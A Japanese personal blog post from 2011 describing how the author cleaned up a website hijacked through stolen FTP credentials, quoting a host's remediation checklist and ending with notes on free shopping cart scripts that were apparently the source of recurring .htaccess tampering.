※ お使いのPCがウィルスに感染したことにより、 FTPパスワードが盗まれた可能性がございます。 必ずウィルスチェックをしてください。

②お客様のPCにてWindows UPDATEやその他お使いのソフトのバージョンアップなど、ご利用環境を最新のものにしてください。
(Adobe Reader、Flash Playerなどのバージョンアップも併せてお願いします)
※ 昨今ではAdobe Readerの脆弱性を突いたウィルスの流行がございました。上記ソフトをお使いの場合、必ずバージョンアップをしてください。
また、java scriptの設定は必ずOFFへとお切り替えください。

③必要に応じてFTPパスワードを変更します
単純な英単語の羅列ではなく、数字などを絡めたわかりづらいものへとご変更ください。

④FTPにて接続し、サーバー上のファイルを一度全て削除します。
・現在設定されている全てのドメインの追加設定を削除してください。
・また、初期ドメインフォルダやその他ご作成のフォルダ・ファイルは、FTPソフトでサーバーへ接続の上お客様ご自身で削除を行ってください。
※ ドメイン設定の削除によりメールデータが全て削除されます。必要なメールはあらかじめ受信してくださいますようお願いいたします。
・改ざんされたhtmlファイル等以外にも、悪意のあるプログラムを設置されている可能性がございます。大変お手数ですが、FTPにてサーバーアカウント上の【全てのファイル】を一度削除していだだくことをお勧めいたします。
・FTPパスワードが漏洩している可能性があるため、FTPにてアクセスできるフォルダ上のファイルは念のために全て削除していただければより安全かと存じます。

⑤サーバーパネルからのドメイン設定追加
・メールアカウント設定、FTPによるデータアップロードなどを行ってください。
※CGI等お使いの場合はパーミッションの変更にご注意ください。

⑥また、この度のようなウィルスにつきましては、お客様のPCに感染した後、同PCに設定されているFTPアカウント情報を悪意ある第三者に奪取されFTP上のデータの改ざん等が行われるという特徴がございます。
このため、「.ftpaccess」を用いてFTPへのアクセスを制限するといった対策も有効でございます。
・ご検討のうえご対処いただければと存じます。

また上記対応と併せて、PHPプログラムなど脆弱性のあるものをそのままにして利用されていないかご確認ください。
※ CMSなどのプログラムは必ず最新のものへとアップデートしてください。
脆弱性があるものをそのまま利用されると、第三者に容易に 改ざんされてしまいます。

以上

【参照】
別サイトを見ると、マルウェアへの感染防止策として下記のようなことがかかれてあります。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3)Adobe ReaderのAcrobat JavaScriptを無効に設定する
(4)JRE(Java Runtime Environment)を最新版に更新する
(5)Flash Playerを最新版に更新する
(6)QuickTimeを最新版に更新する

■対 処■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

①FTPソフトの定番「FFFTP」ソフト。
起動時にパスワード入力の必要が無い古いバージョンを使っていたので、最新のものに変更
http://www2.biglobe.ne.jp/~sota/ffftp.html

②サーバーにアップしているファイルを全てダウンロードしてウィルス検査を実行
どこぞのサイトに書いていた方法だけど、これって意味無いのではないか?

③NucleusCMSのパスワードが簡単なものだったので複雑なものに変更

④脆弱性対策情報データベースサイトで、パソコンに入っているソフトが最新のものかチェック
・MyJVN 脆弱性対策情報収集ツール
・MyJVN バージョンチェッカ
・MyJVN セキュリティ設定チェッカ
の三種類があり、インストールされているソフトが古い場合のアップデート方法も記載されております。
http://jvndb.jvn.jp/apis/myjvn/index.html#VCCHECK

⑤NucleusCMSのアップデート
・日本語版3.51へアップデートするのですが、NucleusCMSは仕様変更になっており、データベースのアップデートが必要になります。
・ひとつのテーブルで項目一個追加になっただけなのですが、アップデートにはずいぶんと手間がかかりました。

⑥NucleusCMSのプラグインである「スキンファイル管理」がFTPソフトの代用をしているので、そのプラグインを外す。

⑦ドメイン取得しているサイトのメールサーバーを調べて、不正なメールが無いかをチェック。

以上の作業。一度にやった訳では無く、毎日少しづつ試して行って、「.htaccess」ファイルが作成されていないかをチェックしながら作業して行ったのですが、それでも解決しません。

⑧HTMLで作成しているドメインのホームページは大丈夫な筈なので、NucleusCMSで作成したものをHTMLで作り変えて見ましたが、それでも駄目です。

⑨PHPを使って、自分で作成したプログラムのデモ版が入っているディレクトリを全削除しても駄目。

⑩結局、ネットでダウンロードしたフリーのショッピングカートが入っていたディレクトリを削除したら、「.htaccess」ファイルが自動生成されなくなりました。

下記のいずれかのショッピングカートが原因と思われますが、特定いたしてはおりません。


ルミーズ ショッピングカート
・remisと言う、クレジット決済の会社で配布しているショッピングカート。
・サクサク導入出来て、カスタマイズも簡単。
CGI Palmaxショッピングカート
・かなり本格的なサイト構築が可能。
・会員制、ポイント制、携帯モバイルショッピング、定形外郵便の送料…等に対応
CGI Pal cart_k ショッピングカート
・maxの携帯機能だけに特化したカート。
CGI Pal Cart_b ショッピングカート
・maxの簡易版、インラインフレームで呼び出して使うなら、こちらのほうが簡単です。
CGIの匠ショッピングカート
・CGI制作をしている会社のショッピングカートシステム
ウェブ・ストアーショッピングカート
・商品の改廃は直接プログラムを編集して行わなければならないので、「サイト構築して商品登録はお客様まかせ」という用途には使えません。
ZenCartショッピングカート
・これだけの機能があるショッピングカートが無料で使えるのは凄いと思います。
・ショッピングカート=ZenCartというほど有名で、導入もさほど難しく無いです。
…が、多機能すぎて、初期画面を見ただけで、これからのカスタマイズを考えるとうんざりします。

copyright © 2011 BreathTake all rights reserved. / Template By innerlife02
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。